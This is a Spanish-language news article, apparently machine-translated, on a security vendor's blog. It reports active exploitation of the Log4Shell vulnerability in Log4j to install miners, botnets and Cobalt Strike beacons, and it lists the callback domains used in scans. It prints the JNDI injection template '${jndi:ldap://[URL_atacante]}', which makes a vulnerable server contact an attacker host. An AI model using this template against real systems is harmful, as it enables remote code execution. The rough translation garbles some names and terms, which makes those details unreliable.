Los expertos ya están solucionando ataques a la vulnerabilidad Log4Shell

attacks on the Log4Shell vulnerability

Los investigadores de seguridad ya están escaneando la red en busca de productos afectados por un peligroso error en la biblioteca Log4j y están arreglando los resultados de los ataques de los ciberdelincuentes a una vulnerabilidad de Log4Shell..

La vulnerabilidad ya está siendo explotada para implementar mineros., Balizas de ataque de cobalto, etc..

Un problema en la popular biblioteca de registro Log4j incluida en el Proyecto de registro Apache fue reportado la semana pasada. La vulnerabilidad de día 0 recibió el identificador. CVE-2021-44228 y anotó 10 fuera de 10 puntos en la escala de calificación de vulnerabilidad CVSS, ya que permite la ejecución remota de código arbitrario (ICE).

El problema se ve agravado por el hecho de que ya han aparecido exploits PoC en la red., y la vulnerabilidad se puede explotar de forma remota, que no requiere habilidades técnicas avanzadas.

La vulnerabilidad obliga a las aplicaciones y servidores basados ​​en Java que utilizan la biblioteca Log4j a registrar una línea específica en sus sistemas internos.. Cuando una aplicación o servidor procesa dichos registros, una cadena puede hacer que el sistema vulnerable cargue y ejecute un script malicioso desde el dominio controlado por el atacante. El resultado será un secuestro completo de la aplicación o servidor vulnerable..

Permítanme recordarles que el parche ya se lanzó como parte del 2.15.0 liberar.

Los ataques a Log4Shell ya han comenzado, Computadora que suena ahora informa. La publicación dice que para explotar el error.. Un atacante puede cambiar el agente de usuario de su navegador y visitar un sitio específico o buscar una cadena en el sitio usando el formato ${jndi:ldap://[URL_atacante]}.

Esto eventualmente agregará una línea a los registros de acceso del servidor web., y cuando la aplicación Log4j analiza estos registros y encuentra la línea, un error obligará al servidor a ejecutar una devolución de llamada o solicitar la URL especificada en la línea JNDI. Luego, los atacantes pueden usar esta URL para enviar comandos al dispositivo vulnerable. (ya sea clases codificadas en Base64 o Java).

Peor, Se puede utilizar simplemente presionar una conexión para determinar si un servidor remoto es vulnerable a Log4Shell..

Se informa que los atacantes ya están usando Log4Shell para ejecutar scripts de shell que descargan e instalan varios mineros.. En particular, Los piratas informáticos detrás del malware Kinsing y la botnet del mismo nombre abusan activamente del error Log4j y utilizan cargas útiles Base64 que obligan al servidor vulnerable a descargar y ejecutar scripts de shell.. El script elimina el malware competidor del dispositivo vulnerable y luego descarga e instala el malware Kinsing., que comenzará a extraer la criptomoneda.
ataques a la vulnerabilidad Log4Shell
Sucesivamente, Expertos chinos de Netlab 360 advertir que la vulnerabilidad se está utilizando para instalar malware Mirai y Muhstik en dispositivos vulnerables. Estas amenazas de IoT hacen que los dispositivos vulnerables formen parte de botnets, Úselos para extraer criptomonedas, y realizar ataques DDoS a gran escala.

Recibimos las primeras respuestas de nuestros honeypots Anglerfish y Apacket, que registró dos oleadas de ataques utilizando la vulnerabilidad Log4j para formar botnets. Un rápido análisis de muestras mostró que se utilizaron para formar las botnets Muhstik y Mirai.. Eso es, en ambos casos, estaban dirigidos a dispositivos Linux.los expertos dicen.

Según analistas de microsoft, una vulnerabilidad en Log4j también se utiliza para colocar balizas Cobalt Strike. Inicialmente, Cobalt Strike es una herramienta comercial legítima creada para pentesters y equipos rojos centrados en la explotación y la posexplotación.. Desgraciadamente, Ha sido amado durante mucho tiempo por los piratas informáticos., desde grupos APT gubernamentales hasta operadores de ransomware.

Hasta ahora, no hay evidencia que garantice que el ransomware haya adoptado un exploit para Log4j. Aún, según los expertos, El despliegue de balizas Cobalt Strike indica que tales ataques son inevitables..

También, además de utilizar Log4Shell para instalar varios malware, Los atacantes utilizan el problema para escanear servidores vulnerables y obtener información de ellos.. Por ejemplo, El exploit que se muestra a continuación puede obligar a los servidores vulnerables a acceder a URL o realizar búsquedas de DNS para dominios de devolución de llamada.. Esto permite a los especialistas en seguridad de la información y a los piratas informáticos determinar si un servidor es vulnerable y utilizarlo para futuros ataques., investigación, o intentar obtener una recompensa por errores de sus propietarios.

A los periodistas les preocupa que algunos investigadores puedan ir demasiado lejos al utilizar un exploit para robar variables de entorno que contienen datos del servidor., incluyendo el nombre de host, nombre de usuario bajo el cual se ejecuta el servicio Log4j, Información del sistema operativo, y número de versión del sistema operativo.

Los dominios y direcciones IP más comunes utilizados para estos análisis son:

  • interactsh.com
  • burpcollaborator.net
  • dnslog.cn
  • papelera${superior:a}ryedge.io
  • fugasix.net
  • bingsearchlib.com
  • 205.185.115.217:47324
  • bingsearchlib.com:39356
  • canarytokens.com

Por Vladimir Krasnogolovy

Vladimir es un especialista técnico al que le encanta dar consejos y sugerencias cualificados sobre los productos de GridinSoft. Está disponible las 24 horas del día, los 7 días de la semana para ayudarte con cualquier pregunta relacionada con la seguridad en Internet.

Dejar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *